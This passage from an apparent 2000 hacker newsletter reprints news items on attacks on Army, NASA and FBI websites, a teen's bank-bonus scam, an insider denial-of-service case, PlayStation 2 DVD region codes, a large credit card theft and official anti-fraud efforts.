HOUSTON � The Army has placed its cyberdefense teams on full alert after a known
hacker group threatened to take down the Army's World Wide Web home page this
Friday.
On Tuesday evening the Army placed its cyberdefenders at the Land Information
Warfare center at Fort Belvoir, Va., on full alert after a group known as the Boys
from Brazil threatened to hack into the Army home page on Friday.
But today the Army clarified that the hacker group it is watching is Hacking for
Girliez, which took down the New York Times' site in September 1998. Most of the
hackers' remarks appeared in comment tags, which can be seen in source material
but not on a Web page. The tags include such remarks as "'Immature kids' were able
to bypass...$25,000 firewalls [and] bypass the security put there."
Philip Loranger, chief of the Command and Control Protect Division in the Army's
Information Assurance Office, speaking here at the 2000 Army Directors of
Information Management Conference, said the Army is prepared for any attack
against the its Web site.
"We've had to activate some countermeasures to protect the Army home page,"
Loranger said, declining to provide specifics for security reasons. However, he said
the countermeasures being put in place do not include disconnecting the Army site
from the Internet.
Specific details emerged today on some of the steps the Army has taken in the past
few months to prepare for these types of attacks. Lt. Col. James Withers, a
systems engineering specialist with the Army signal command, said the Army's
regional CERTs have written special software scripts that will help defend against
known hacker tactics. The Army also developed Web cache proxy servers that
divert Web surfers away from primary servers residing behind firewalls on Army
installations.
The Army is also in the process of deploying a protected domain name system
architecture that will help the service regain control of all Army Internet sites and
network entry points.
"We know the hackers mapped [the old architecture]," Withers said, adding that 90
percent of the Army's global protected DNS architecture should be completed by
April.
Loranger demonstrated for conference attendees how simple it is for hackers to
exploit known operating system vulnerabilities using widely available hacker tools and
standard systems administrator procedures. In fact, Loranger, with the approval of
the Army's staff counsel, demonstrated a live hacking of another computer system
to show how within minutes hackers can crack into known password vulnerabilities
and take over entire systems and networks.
Loranger also said that the lack of international laws governing conduct on the
Internet poses real obstacles to the government's ability to respond to
foreign-based hacker attacks. Loranger pointed out that some graduate-level
computer education schools in India, for example, have established hacking into U.S.
government systems as an academic requirement.
Lt. Col. LeRoy Lundgren, program manager for the Army's National Security
Improvement Program, said as many as 285,000 network queries were denied by
Army security systems last year because of the questionable method used.
Lundgren added that the Army has seen an increase in the number of queries
originating in foreign countries, particularly China and Bulgaria.
@HWA
31.0 HNN:Mar 16th:NASA Fears CyberAttack From Brazil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by William Knowles
NASA's Jet Propulsion Laboratory has blocked all access
to its web site from addresses originating in Brazil due to
fears of a cyber attack. JPL spokes people said that
access would be restored once additional security
measures where in place. (How does blocking one
country effect anything?)
Newsbytes
http://www.newsbytes.com/pubNews/00/145708.html
NASA Division Battles The Hack From Ipanema
By Robert MacMillan, Newsbytes WASHINGTON, DC, U.S.A., 15 Mar 2000, 1:15
PM CST
From Antonio Carlos Jobim to the samba, the US generally has welcomed some
of the cooler cultural exports from Brazil, but the latest one - a series
of hack attacks on NASA's Jet Propulsion Laboratory at CalTech - has the
agency bossa nova-ing its way toward beefing up its security measures.
JPL Spokesman Frank O'Donnell confirmed for Newsbytes an MSNBC report that
the agency has shut down access to queries emanating from Brazil until the
agency's security team makes some necessary improvements to its
network.
O'Donnell said that the Brazil shutout was not a "blacklist" attempt, as
earlier reports indicated.
"There was a number of recent attacks on JPL hosts originating from
various sites in Brazil, and as a temporary move while our computer
security people work, we're blocking network access to JPL from Brazil,"
O'Donnell said. "But this is a temporary thing."
He said normal service to South America's largest nation would return "in
a matter of days at most."
He added that he is "not aware of any (security) compromises per se in
these attacks."
Highly secure data at JPL generally is not stored on hosts that are
connected to the Internet, O'Donnell also said, but added that he could
"not go into a great deal of detail" on what kind of information was
sought.
MSNBC reported the Brazil problem after a network analyst at the Bank of
Brazil in Brasilia reported that he could not access the JPL site.
The service also reported that a CERT official at its headquarters in
Pittsburgh, Pa., said that blocking access to an entire network or country
is reasonably common, though the official said that spoofing attacks -
when the address of the attacking e-mail in a denial of service
attack is falsified - blocking against a particular domain or country code
becomes largely ineffective.
O'Donnell said that CERT and the JPL have been working jointly on security
issues.
Reported by Newsbytes.com, http://www.newsbytes.com .
13:15 CST
@HWA
32.0 HNN:Mar 16th:FBI Site Hit by DOS Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by William Knowles
Just as the FBI was posting information about the 50th
anniversary of its "Ten Most Wanted Fugitives" to its
web site it was hit with a denial of service attack. The
attacked forced the web site offline for several hours.
UPI - via Virtual New York
http://www.vny.com/cf/News/upidetail.cfm?QID=71527
FBI Web site attacked
Wednesday, 15 March 2000 15:15 (ET)
FBI Web site attacked
By MICHAEL KIRKLAND
WASHINGTON, March 15 (UPI) -- There has been another "denial of service"
cyber-attack against a high-profile Web site, sources told UPI Wednesday
-- this time the target was the FBI's own Web page, which was taken out
of action for several hours Tuesday.
The attack hit just as the FBI was posting information about the 50th
anniversary of its "Ten Most Wanted Fugitives" list, which was celebrated
Tuesday at the bureau with the opening of a permanent headquarters
exhibit.
A "denial of service" attack overwhelms a Web site with requests for
information, but with "spoofed" -- fabricated -- return e-mail addresses.
A site tries to endlessly answer the requests, and in effect ties itself
in knots until it shuts down.
There was no indication yet on whether Tuesday's cyber-attack was a
"distributed" denial of service attack, similar to those launched against
major commerical sites on the Internet early last month. Those attacks
temporarily crippled Yahoo!, E-Trade, CNN.com and others.
U.S. investigators were still pursuing leads on the latest attack
Wednesday, defining its nature.
A "distributed" attack is one which uses "innocent" third-party computer
systems.
Illegal hackers, called "crackers," usually find the attack software
"tools" available "in the wild" on the Internet.
The "distributed denial of service," or DDOS, tools enable a cracker to
break into an unsuspecting computer system and implant "packets" or
"daemons" that will cause the system to launch an attack against a target
unless detected and disabled in time. Literally hundreds of "zombie"
computer systems can be infected, without their operators' knowledge, and
can launch a simultaneous attack.
The FBI is still searching for at least two unnamed suspects in
February's attacks. Much of the search has been concentrated in
Canada with the help of the Royal Canadian Mounted Police.
Agents are also concentrating on Germany, where the DDOS "tools" may have
originated, though Germany is not believed to be the country of origin
for the actual attacks.
There was no immediate indication Wednesday that the attack on the FBI
site came from the same suspects wanted for the attacks on the commerical
sites.
-- Copyright 2000 by United Press International.
All rights reserved.
@HWA
33.0 HNN:Mar 16th:Teenager Arrested in Online Bank Scam
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
Someone has finally been arrested in a scam that has
been circling around the Internet for months. Various
online banks offer cash rewards just for opening an
account. The scam works by opening several accounts
under false names and then transferring the free money
from each account into a real account. A 14 year old
student at Thomas Jefferson Middle School in Jefferson
City Missouri was able to amass over $2000. The scam
was uncovered by a postal worker after he started
delivering 'bushels' of mail to an address owned by the
kids father. (Discovered by a postal worker?)
APB News
http://www.apbnews.com/newscenter/internetcrime/2000/03/15/netbanker0315_01.html
Teen Busted in Internet Banking Scam 120 Fake Accounts Yielded $2,000 in
Rewards
March 15, 2000
By Carol Huang
JEFFERSON CITY, Mo. (APBnews.com) -- An eighth-grader in rural Missouri
signed up for more than 120 fake bank accounts through the Internet to
rake in a total of $2,000 in new customer cash rewards, authorities said
today.
"He didn't realize the gravity of what he was doing, but he knew it was
wrong and that it wasn't his money," said Cole County Sheriff John
Hemeyer.
Hemeyer said the boy, 14, a student at Thomas Jefferson Middle School, had
been helping his father, a self-employed construction contractor, enter
business records onto a computer when he found an Internet site offering
an opportunity to open a bank account.
Eventually, the teen had more than 120 accounts at banks around the
country, each under a name generated by his computer, and had transferred
more than $2,000 in cash freebies into a real account of his own.
Puzzled postal worker
A puzzled postal worker reported delivering "bushels of baskets of mail"
to a vacant trailer on a plot of land, and investigating deputies went to
the boy's father, who owns the land.
Besides entering the teen into the juvenile court system, deputies
confiscated his computer, which he had upgraded using the cash rewards,
Hemeyer said.
"It's the only referral we've ever had on this kid. So if he quits, and
pays back some money, that will be about it," Hemeyer said.
Carol Huang is an APBnews.com staff writer (carol.huang@apbnews.com).
@HWA
34.0 HNN:Mar 16th:Former Employee Arrested For Attack On Company
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by no0ne
31 year old Abdelkader Smires, was charged in United
States District Court in Brooklyn with computer-related
fraud and remained in custody pending a bail hearing on
Friday. Smires is being accused of causing his former
company, Internet Trading Technologies, Inc. (ITTI)
which provides software that allows market-makers to
conduct online securities transactions, to shut down
several times since last Thursday by directing
coordinated attacks against the firms computer
networks.
NY Times
http://www.nytimes.com/aponline/a/AP-Cyber-Spat.html
C|Net
http://news.cnet.com/news/0-1007-200-1573627.html?tag=st.ne.1002.thed.1007-200-1573627
Associated Press - via San Jose Mercury News
http://www.sjmercury.com/breaking/docs/073358.htm
NYTimes: pay
-=-
C|Net
ITTI employee arrested in hacker attack By Bloomberg News March 15, 2000,
4:20 p.m. PT
An employee of Internet Trading Technologies, a provider of
trade-execution services for securities firms, was arrested yesterday and
charged with attacking ITTI computers and causing interruptions in its
services this week, the U.S. Attorney's Office in Brooklyn said.
The employee, Abdelkader Smires, a database programmer, launched a series
of data transmissions intended to cause the firm's computers to crash
after he became involved in a dispute with his employers, according to
U.S. Attorney Loretta Lynch. He was arraigned in federal court in
Brooklyn yesterday and ordered held without bail, Lynch said.
ITTI's software system allows securities firms to
trade Nasdaq stocks online, a representative for the
company said. It is marketed by other firms, such as
Trimark Group, under their own brand names, she
said.
The system links small broker-dealers with
market-makers like Knight/Trimark, Mayer & Schweitzer
and others, a Knight/Trimark spokesman said. Firms use
it so they don't have to install and maintain
direct hardware and software connections to
market-makers.
Smires' attacks caused "significant interruption of ITTI's trade execution
over the past three business days," Lynch said. "If the attacks had
continued to cause denial of service, the viability of ITTI would have
been threatened, resulting in major disruption of trading on the
Nasdaq," she added.
The U.S. Secret Service's Electronic Crimes Task Force, which is a
cooperative effort of 25 local, state and federal agencies and 45 private
companies, helped trace Smires' computer attacks, said Bob Weaver, a
Secret Service representative.
Conflict developed between Smires and his bosses when ITTI's chief
development officer, who had hired Smires and was his supervisor, resigned
March 6, according to an affidavit filed in the case by Secret Service
Agent Peter Cavicchia. The firm then hired systems consultants to help
fill the gap created by the departure, but Smires and another,
unidentified programmer refused to help train the newcomers on ITTI's
systems, according to the affidavit.
Smires and the other programmer then told the firm's executives that they
would quit unless they were given "more employment security, a greater
salary and a greater equity interest in the firm," Cavicchia said. ITTI
responded by offering them one-year employment contracts, raises and
stock options, he said.
Smires and the other programmer nevertheless decided to resign, according
to the affidavit. The pair demanded "$70,000 immediately, 50,000 stock
options and more substantial salary increases," Cavicchia said. A
"tentative agreement" was reached March 8, Cavicchia said.
The next day, Smires and the other programmer backed out of the agreement,
demanded more favorable terms and said ITTI executives should call them
only if the firm agreed to the specific counter-offer, Cavicchia said.
ITTI didn't call. Later on March 9, the attacks on ITTI's system
began.
The attacks continued Friday, Monday and yesterday, according to the
affidavit, shutting down ITTI's computers for a total of about five hours.
"While one of the attacks was occurring, ITTI computers revealed the
Internet Protocol address of the attacking computer," enabling
employees to trace it to a building on the Queens College campus in
Flushing, New York, where Smires is an instructor, Cavicchia said. Secret
Service agents were told that the particular Queens College computer from
which the attack was launched was being used by Smires at the time, the
affidavit said.
After his arrest, Smires admitted that he was responsible for the March 13
and March 14 attacks, Cavicchia said.
Smires also waged some of his attacks from a Kinko's copy shop in
Manhattan, Lynch said.
Copyright 2000, Bloomberg L.P. All rights reserved.
-=-
Assoc.Press; 404
@HWA
35.0 HNN:Mar 16th:PlayStation2 can Play US DVD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by acopalyse
Some DVDs released for the North American Region can
be played on PlayStation2 consoles in England. While
pressing buttons in a certain sequence while the
PlayStation2 boots up into DVD mode can sometimes
allow Region 1 CDs to be played on the Region 2 device.
(Wonder if this will have any effect on the DeCSS
lawsuit?)
The Register UK
http://www.theregister.co.uk/000315-000017.html
Gaming Intelligence Agency
http://www.thegia.com/news/0003/n11a.html
Register;
Posted 15/03/2000 5:04pm by Linda Harrison
PlayStation 2 can play US DVDs - apparently
Gaming boffins claim to have found a way to play American DVDs on PlayStation 2
consoles.
Three codes have surfaced which make it possible to play Region 1 (North America)
DVDs on the PlayStation 2 -- a Region 2 (Europe, Japan and Asia) DVD player.
Like console video games, DVDs are usually fixed by vendors so they can only
operate within specific world markets. It was previously believed the PlayStation 2,
launched solely in Japan, could play only Region 2 DVDs.
But the Gaming Intelligence Agency's Web site this week claimed to have found the
codes needed to overcome this inconvenience. These codes do not work every time
-- a hitch believed to be linked to how hard the Dual Shock 2' buttons are pressed.
"All three codes should be entered when the PlayStation 2 DVD bootup sequence
begins fading to black... If you get a region failed message, don't despair; just try
again. The same disc will work some times and not others," it reports.
"While these codes certainly leave room for improvement, the advent of any region
bypass is good news for system importers and DVD fans," thegia.com adds.
Sony Computer Entertainment in the UK chose not to comment.�
-=-
GIA;
Play American DVDs on Japanese PlayStation 2
[03.11.00] � Simple controller codes make it possible.
Two simple controller codes have recently surfaced that make it
possible to play Region 1 (North America) DVDs on the PlayStation
2, a Region 2 (Japan and Asia) DVD player. Much like console
videogames, DVDs are region encoded to dissuade consumers from
importing titles from outside of the country. It was previously
believed that the PlayStation 2 would only play Region 2 DVDs.
These codes currently only work with about partial frequency. We
are currently unsure why they do not work 100% of the time; we
believe they may be dependent on how hard the user presses the Dual
Shock 2's analog buttons. If you own a PS2 and Region 1 movies, the
GIA is interested in hearing about your experiences with the code,
especially if you find a way to make Region 1 movies play with
greater frequency. Please e-mail staff@thegia.com with the movie
tested, code used, and the tries / success ratio.
All three codes should be entered when the PlayStation 2 DVD bootup
sequence begins fading to black. The buttons should be held until
either the DVD movie starts up (1 line of Japanese) or a "region
failed" message appears (2 lines of Japanese). If you get a region
failed message, don't despair; just try again. The same disc will
work some times and not others.
The first code comes from the GIA's own J.T. Kauffman; it is
apparently circulating Japanese message boards and web sites. The
code is: hold down L1, Circle, and Select. This code has worked
with both the Dual Shock 1 and 2 with about 40% accuracy.
The second code comes from a friend of the GIA known as Barubary.
The code is: press in L3 (the left analog stick) straight and hard.
This code does not work with the Dual Shock 1, but works with the
Dual Shock 2 with about 60% accuracy.
The newest, third code comes from GIA friend Nick "Rox" Des Barres.
Nick reports that this code works an astounding 95% of the time.
The instructions follow:
Insert a first-generation PlayStation pad (i.e., not an analog
controller) in Control Port 1 of the PS2. Insert DVD Hold UP on
the pad until the DVD menu appears Highlight the play icon and
select it.
Nick adds, "I tried this on 20 or so DVDs, and it booted all of
them. Two or three would not play. You could access the menus,
however. It should be noted I was using a Japanese first-generation
PS1 pad, though I can't imagine why it wouldn't work with American
ones."
While these codes certainly leave room for improvement, the advent
of any region bypass is good news for system importers and DVD
fans. The GIA will keep you posted on any new developments on the
PS2 DVD front.
@HWA
36.0 HNN:Mar 16th:ISTF Releases Security Recommendations
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Chris
The Internet Security Task Force, a conglomeration of
big name tech companies ISPs and other e-business
firms have produced a "vendor neutral set of
recommendations in understandable language" about the
problems and solutions in internet security. The paper
doesn't say anything new, but because it was released
by "credible" vendors and not "the evil underground"
some suits might finally pay attention. But then again,
maybe not.
Initial Recommendations For Conducting Secure eBusiness
http://www.ca.com/ISTF/recommendations.htm
@HWA
37.0 HNN:Mar 17th:485,000 Credit Cards Numbers Stolen, Found on Gov Computer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
A file containing credit card numbers, expiration dates,
names and addresses was found last year on a US
government website. The thief has been traced back to
a European country but it has not been revelaed which
one. It is also not been revealed which online service
the numbers came from or which government agency
was unwittingly storing the numbers. The incident has
been confirmed by the Secret Service but first came to
light when a bank employee notified reporters. The bank
received the notice of the credit card heist from Visa
however failed to notify its card holders.
MSNBC
http://www.msnbc.com/news/382561.asp
Vast online credit card theft revealed
Hacker hid data on 485,000 cards on U.S. agency�s Web site
By Mike Brunker
� MSNBC
March 17 � In the largest known case of
cybertheft, a computer intruder stole information
on more than 485,000 credit cards from an
e-commerce site and then secretly stored the
massive database on a U.S. government agency�s
Web site, MSNBC.com has learned. Credit card
companies notified financial institutions, but
many of the compromised accounts remain open
to this day because the banks neither closed
them nor notified customers of the theft.
THE HEIST occurred in January 1999, but only a few
details have previously been made public.
The scope of the crime emerged in a letter dated Dec.
27 from Visa USA to member financial institutions. Jim
Macken, a Secret Service spokesman, confirmed that the
incident had occurred and added some details in an
interview on Thursday.
Two arrested in online credit card case
The Visa letter, a copy of which was provided to
MSNBC by a source in the banking industry, quotes federal
authorities as saying that the credit card information �
including expiration dates and cardholder names and
addresses � was stolen from an Internet retail site by a
hacker.
It said the store of
data on Visa,
MasterCard, American
Express and Discover
cards was discovered on
an unspecified government
computer system during an
audit. The letter did not
say when the stolen data
was found, but Macken
said it was discovered
before March 1999 on the
Web site of a U.S. government agency, which he declined
to identify.
.This government Web administrator noticed that a lot
of the memory was chewed up for no reason, so he
checked and found the file (containing the stolen data),. he
said.
NO EVIDENCE OF FRAUDULENT USE
There was no evidence that any of the cards were used
to commit fraud and some of the accounts were not active,
Macken added.
The letter said that authorities had not identified the
thief, but Macken said investigators have since traced the
criminal to Eastern Europe. The investigation is ongoing and
involves diplomatic contacts with the country in question, he
said.
The Internet retail site from which the data was stolen
has also since been identified, but Macken declined to name
it.
It was unclear why
the thief hacked the
government Web site and
stored the data there,
Macken said, though he
allowed that the act might
have been the online
equivalent of thumbing
one�s nose at U.S. authorities.
As MSNBC reported last week, U.S. authorities have
so far been stymied in their attempts to prosecute credit
card thieves and fraud rings based in the former Soviet bloc
nations and Asia.
Overseas fraud artists are untouchable
Secret Service officials testified about some details of
the case before Congress early last year to demonstrate the
peril that computer hackers pose to online commerce,
Macken said. Their comments generated little coverage,
however, and the scope of the case is only now becoming
clear.
EFFORT TO HIGHLIGHT INACTION
The copy of the letter from Visa was obtained by
MSNBC from an employee at the Navy Federal Credit
Union, in Merrifield, Va., the world�s largest credit union
with 19 million members. The letter was provided, the
source said, to highlight the fact that some financial
institutions are failing to act to protect consumers when
there is evidence that their credit card information has been
stolen.
Officials at the credit union took no action to warn
customers whose account numbers were among those
stolen by the hacker, said the source, who spoke on
condition of anonymity. Instead, they ordered a .spot
check. of 50 to 100 accounts and then decided that no
further action was necessary, the source said.
The source said the same procedure was followed two
weeks later, when Visa alerted the institution of the theft of
data on 300,000 credit cards from the CD Universe Web
site � the biggest theft of credit card data over the Internet
that previously had been made public.
.It was decided that ... it would be too much of an
inconvenience and too costly to shut down the accounts and
issue new numbers,. said the source. .It was deemed not
the credit union�s responsibility..
The credit union source said that fraudulent charges
have subsequently appeared on some of the accounts that
were compromised, though it is impossible to definitively
link the fraud to the theft.
CREDIT UNION RESPONDS
In a statement issued Friday in response to
MSNBC.com�s story, Navy Federal Credit Union officials
did not challenge the assertion that they did not warn
customers of the theft. But they denied that cost or
inconvenience were factors in the decision.
.When we received notification of this problem from
VISA USA, we reviewed our systems and were confident
that all appropriate controls were in place to protect our
members� financial welfare,. said Tom Steele, a credit union
vice president in charge of the credit card division.
.Additional checks of the 1,500 Navy Federal credit card
accounts identified by VISA USA confirmed that the steps
we had taken safeguarded every cardholder � we have
also not seen any increase in fraud losses..
The statement also indicated that no Navy Federal
cardholders have been victims of identity theft as a result of
the heist.
Calls to American Express and a half dozen major
banks seeking information on their response when notified
of the theft were not returned.
Scott Lynch, a spokesman for Visa USA, said he
could not comment on the case. Nor would he explain why
Visa didn�t notify its members of the theft until December.
Alicia Zatkowski, a spokeswoman for Discover
Financial Services, said the firm�s fraud investigators were
not aware of such a case.
Vincent DeLuca, vice president of fraud control at
MasterCard International, said, .We are aware of some
cases but we�re not at liberty to talk about any ongoing
investigations.
Several financial institutions ordered the wholesale
closure and replacement of cards that were compromised in
the CD Universe case, which also remains under
investigation. Such across-the-board replacement programs
were well publicized in an effort to assure online consumers.
Banks and credit card companies often point out that
consumers are responsible only for the first $50 of
fraudulent online purchases � and that is nearly always
waived.
But stolen credit card information can be used to
commit fraud against unsuspecting Internet merchants, who
in most cases bear the cost of the crime, or for identity theft
� a practice in which criminals use personal data to obtain
new credit, borrow money or make big-ticket purchases.
The Treasury Department on Wednesday held a
two-day national summit on identity theft to focus attention
on what Treasury Secretary Lawrence Summers described
as .a growing and major criminal threat..
At the session, victims said that while they did not
ultimately have to pay for the losses run up in their names,
identity theft is by no means a victimless crime.
.It has been sheer hell, and I do mean hell,. said
Darlene Zele, a Rhode Island hospital worker who one of
the victims who testified about years of struggling to repair
the havoc wrought on their credit records. .At this point,
after five years, it�s still not over..
Got a tip about the use or abuse of credit cards online?
Write to tipoff@msnbc.com.
@HWA
38.0 HNN:Mar 17th:Brazil Gov Sites Suffering Under DDoS Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by webmaster
A group called DDoS-BR is spreading denial of service
attacks against Brazilian government networks. The
Brazilian Supreme Court and the National
Telecommunications Agency web sites have been
shutdown for most of the week due to the attacks. The
Brazilian authorities are looking forward legislation that
will soon be approved which might give the federal
police enough power to investigate and arrest electronic
criminals. (Hopefully they have the knowledge to use
that power wisely.)
SecureNet - In Spanish correction: Portuguese ...
http://www.securenet.com.br/cgi-bin/news?id=15030003
@HWA
39.0 HNN:Mar 17th:Secret Service Harassing Bernie S Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by macki
Five years to the day after Bernie S. was arrested at
gunpoint and subjected to nearly 17 months of
imprisonment by the United States Secret Service,
agents of the USSS have again begun some kind of cat
and mouse game, the nature of which has yet to be
revealed.
2600
http://www.2600.com/news/2000/0317.html
SECRET SERVICE HARASSING BERNIE S AGAIN
03/17/00
Five years to the day after Bernie S. was arrested at gunpoint and
subjected to nearly 17 months of imprisonment by the United States Secret
Service, agents of the USSS have again begun some kind of cat and mouse
game, the nature of which has yet to be revealed.
A Special Agent from the Secret Service showed up unannounced at
Bernie's workplace and told his employer they wanted to question Bernie,
who happened to be out sick that day. When Bernie returned to work the
following day and discovered the Secret Service wanted to talk to him, he
surprised the agent by calling him. What followed was an extremely strange
and circular conversation.
At first the SS agent wouldn't talk to him at all. Then he called
Bernie back and said they needed to talk with him at his home at 7am the
next morning. When Bernie explained he was just getting over a serious
illness and that this was an unreasonable hour, the agent suggested 6am.
Bernie repeatedly offered to answer their questions at several neutral
locations, but they said any place other than his home was unacceptable.
Bernie told them he had nothing to hide, but that he was not comfortable
having Secret Service agents poking around inside his house and that they
would have to get a warrant before he'd let them in. The agent then said
he had to go and would talk to him later.
About ten minutes later, a second, more polished, SS agent called
Bernie and continued trying to persuade him to let them inside his home.
The agent tried to goad Bernie by implying he must have something to hide,
and that if he didn't then there was no reason why they shouldn't be
allowed inside his home. At this point, Bernie tried to explain by saying
if you asked 100 people on the street if they'd want federal agents in
their living room and bedroom, almost everyone would say no and that he
was no exception. The SS agent disagreed, saying people have no legitimate
fears about such a visit.
Bernie repeatedly tried to get the SS agents to tell him what they
wanted. Finally, the second agent said, "I need to check to see if your
telephone and Cable TV wiring is hooked up properly." This preposterous
claim made Bernie actually laugh out loud. But as a further gesture of
cooperation, Bernie offered to allow Bell Atlantic and Comcast Cable TV
technicians to inspect his house wiring for them. The SS agents said that,
too, would be unacceptable. It became clear the SS agents were simply
trying anything they could to get a foot in his door. Needless to say,
after Bernie's previous horrendous experience with the Secret Service,
their feet are not welcome in his home. He then gave them his attorney's
name and telephone number and told them to address future inquiries
directly to his lawyer.
So what is this all about? We don't know yet, but clearly something
is up. And the way the Secret Service has played sick games with people's
lives in the past, we felt it would be wise to alert everyone now so we
can all keep a closer eye on them before they try any further outrageous
actions under the veil of secrecy.
@HWA
40.0 HNN:Mar 17th: Secret Service to Work with Citicorp to Fight Fraud
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
The U.S. Secret Service and Citicorp, a unit of New
York-based Citigroup Inc., are working together to
develop a pilot program to fight identity theft and other
types of e-commerce fraud. The program will devise a
strategy to identify suspicious e-commerce activities,
including forged identities and other schemes used to
commit bank and credit fraud.
Computer World
http://www.computerworld.com/home/print.nsf/all/000316C9BE
US Treasury Dept. - Press Release
http://www.ustreas.gov/press/releases/ps465.htm
Computer World;
Secret Service, Citicorp team to
fight e-commerce fraud
U.S. Treasury Department announces new initiatives to
combat identity, other types of e-commerce fraud
By Linda Rosencrance
03/16/2000 The U.S. Secret Service and Citicorp, a unit of
New York-based Citigroup Inc., are working together to
develop a pilot program to fight identity theft and other
types of e-commerce fraud, according to a statement
issued by the U.S. Treasury Department.
The announcement was made at the two-day National
Summit on Identity Theft convened by Treasury
Secretary Lawrence H. Summers yesterday. The summit
includes more than 150 participants from federal, state
and local government agencies; financial institutions;
credit-card companies and reporting agencies; as well
as identity theft victims and consumer advocacy groups.
"Criminals are exploiting new technologies to make a
significant profit from an old crime," Summers said in
the statement. "We will continue to work with the
private sector to strengthen our efforts to combat this
threat."
The program being developed by the Secret Service and
Citicorp will devise a strategy to identify suspicious
e-commerce activities, including forged identities and
other schemes used to commit bank and credit fraud.
At yesterday's summit, Summers also said that the
Secret Service is developing a computer-based training
program to help law enforcement officials handle
financial crimes.
-=-
Press Release;
TREASURY NEWS
FROM THE OFFICE OF PUBLIC AFFAIRS
FOR IMMEDIATE RELEASE
March 15, 2000
LS-465
TREASURY CONVENES IDENTITY THEFT SUMMIT
Treasury Secretary Lawrence H. Summers convened a two-day National Summit
on Identity Theft today and announced four new initiatives targeted at
cracking down on the increasing threat of identity theft.
Criminals are exploiting new technologies to make a significant profit
from an old crime," said Treasury Secretary Summers. "We will continue to
work with the private sector to strengthen our efforts to combat this
threat."
Called for last year by President Clinton, the Summit will address the
prevention of identity theft, remediation and enforcement efforts with the
public and private sector. The Summit will consist of a series of panels
and more than 150 participants from federal, state and local
government agencies, financial institutions, credit card companies and
reporting agencies, as well as identity theft victims, consumer advocacy
groups and private sector representatives.
The four new Treasury initiatives to help combat identity theft include:
Skimming and counterfeit check databases currently used to identify
common suspects, defendants of identity theft, and address criminal
trends prevalent in financial crimes today. These databases were
developed and are maintained by the U.S. Secret Service in
partnership with the financial industry;
A computer-based training module developed by the U.S. Secret Service
that will focus on financial crimes and all pertinent statutes
including identity theft, and be made available within the agency as
well as local and state law enforcement officials
throughout the U.S.;
A pilot program, developed by the U.S. Secret Service and Citicorp,
to help identify suspicious activity on electronic commerce. The
program will attempt to develop a protocol for the identification of
identity theft and other schemes used to commit bank
fraud, credit fraud and money laundering within electronic commerce
and the immediate notification of law enforcement authorities; and
Forums and mini-conferences to maintain a dialogue between the
private and public sector.
Treasury's National Summit on Identity Theft is the first national level
conference involving law enforcement, victims, industry and nonprofits
interested in the issue.
@HWA
41.0 HNN:Mar 17th:Computer History Lecture Series
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by McIntyre
The Computer Museum History Center, a non-profit
entity dedicated to the preservation and celebration of
computing history, will be having a lecture series
entitled "Early Computer Crime". Speakers include
Whitfield Diffie, John Markoff, Peter Neumann and Cliff
Stoll. The Lecture will be held on Thursday, March 23,
2000 at NASA Ames Research Center Auditorium,
Moffett Field, Mountain View, CA. It is requested that
RSVPs be received by Monday March 20. (Sounds like
fun. I would like to cheer some the speakers and heckle
others.)
The Computer Museum
http://www.computerhistory.org/events/earlycrime_03232000/
@HWA
42.0 HNN:Mar 17th: Australian Police To Increase Online Presence
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by William Knowles
Australian Federal Police Commissioner Mick Palmer said
that in an effort to get better training for the people
they already have and in an effort to attract more
qualified applicants the Police will conduct a staff
exchange with private industry. The commissioner will
also establish an Electronic Crime Steering Committee to
evaluate Australia's capacity to fight electronic crime
and will develop an Australian Law Enforcement
Electronic Crime Strategy by mid summer.
The Age
http://www.theage.com.au/breaking/0003/17/A15120-2000Mar17.shtml
Police to step up fight against e-crime
Source: AAP | Published: Friday March 17, 3:38 PM
Police are set to recruit computer boffins in a bid to boost the fight
against so-called e-crime.
The potential to commit crimes using computers and other information
technology was one of the greatest problems ever to face law enforcement,
Australian Federal Police Commissioner Mick Palmer said today.
Speaking at the end of a week-long conference of police commissioners
from Australia, New Zealand, Fiji and Papua New Guinea, Commissioner
Palmer said a staggering 900 million people would be using the Internet
by the end of this year.
'People who abuse these technologies have the capacity to commit offences
on a global basis, with complete anonymity, with speed and on a scale not
previously encountered,' Commissioner Palmer told journalists.
Credit card fraud, electronic vandalism, terrorism, electronic money
laundering and tax evasion are some examples of electronic crime.
'The capacity of properly organised, electronic based crime to undermine
the financial stability of small and medium sized countries is very
real,' Commissioner Palmer said.
A major problem for police is how to attract personnel with enough
technical expertise to fight this new crime.
Commissioner Palmer said already police recruitment and selection was
becoming more flexible.
'Clearly some of the technical skills that we are going to need ... come
at a very high cost,' he said.
'People ... in that industry are earning a lot of money and that makes
the partnerships with business and the wider business community very
important.'
Police will be looking to exchange staff with private industry to gain
the skills necessary, probably on short term, project based arrangements.
Commissioner Palmer said discussions and negotiations had already begun
on this issue and Commonwealth Bank CEO David Murray addressed the
commissioners.
'We will be recruiting people from the coalface for short periods of
